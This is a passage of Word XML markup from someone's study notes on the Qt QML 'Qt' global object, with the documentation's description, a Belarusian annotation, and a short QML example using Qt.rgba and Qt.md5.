        </w:r>
        <w:r w:rsidR="008C71BA" w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="008C71BA" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="008C71BA" w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="008C71BA" w:rsidRPr="00AD5879">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="00BE3BBD" w:rsidRDefault="008C71BA" w:rsidP="00BE3BBD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1255" w:name="_Toc483000793"/>
      <w:bookmarkStart w:id="1256" w:name="_Toc483003791"/>
      <w:bookmarkStart w:id="1257" w:name="_Toc483604145"/>
      <w:bookmarkStart w:id="1258" w:name="_Toc483605365"/>
      <w:r w:rsidRPr="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt QML Type</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1255"/>
      <w:bookmarkEnd w:id="1256"/>
      <w:bookmarkEnd w:id="1257"/>
      <w:bookmarkEnd w:id="1258"/>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="008C71BA" w:rsidP="00BE3BBD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1259" w:name="_Toc483000794"/>
      <w:bookmarkStart w:id="1260" w:name="_Toc483003792"/>
      <w:bookmarkStart w:id="1261" w:name="_Toc483604146"/>
      <w:bookmarkStart w:id="1262" w:name="_Toc483605366"/>
      <w:r w:rsidRPr="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Detailed Description</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1259"/>
      <w:bookmarkEnd w:id="1260"/>
      <w:bookmarkEnd w:id="1261"/>
      <w:bookmarkEnd w:id="1262"/>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="008C71BA" w:rsidP="008C71BA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="00BE3BBD">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt</w:t>
      </w:r>
      <w:r w:rsidR="00BE3BBD">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object is a global object with utility functions, properties and enums</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Патэрн праектавання бібліятэк.</w:t>
      </w:r>
      <w:r w:rsidR="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="008C71BA" w:rsidP="008C71BA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">It is </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>not instantiable</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; to use it, call the members of the global</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object directly. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="008C71BA" w:rsidP="008C71B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C71BA">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="008C71BA" w:rsidP="008C71BA">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C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="00490E7E" w:rsidP="008C71BA">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529" w:history="1">
        <w:r w:rsidR="008C71BA" w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Text</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008C71BA" w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C71BA" w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="008C71BA" w:rsidP="008C71B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C71BA">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    color</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rgba</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="008C71BA" w:rsidP="008C71BA">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C71BA">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    text</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>md5</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"hello, world"</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="008C71BA" w:rsidP="008C71BA">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="008C71BA" w:rsidP="00BE3BBD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1263" w:name="enums"/>
      <w:bookmarkStart w:id="1264" w:name="_Toc483000795"/>
      <w:bookmarkStart w:id="1265" w:name="_Toc483003793"/>
      <w:bookmarkStart w:id="1266" w:name="_Toc483604147"/>
      <w:bookmarkStart w:id="1267" w:name="_Toc483605367"/>
      <w:bookmarkEnd w:id="1263"/>
      <w:r w:rsidRPr="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enums</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1264"/>
      <w:bookmarkEnd w:id="1265"/>
      <w:bookmarkEnd w:id="1266"/>
      <w:bookmarkEnd w:id="1267"/>
    </w:p>
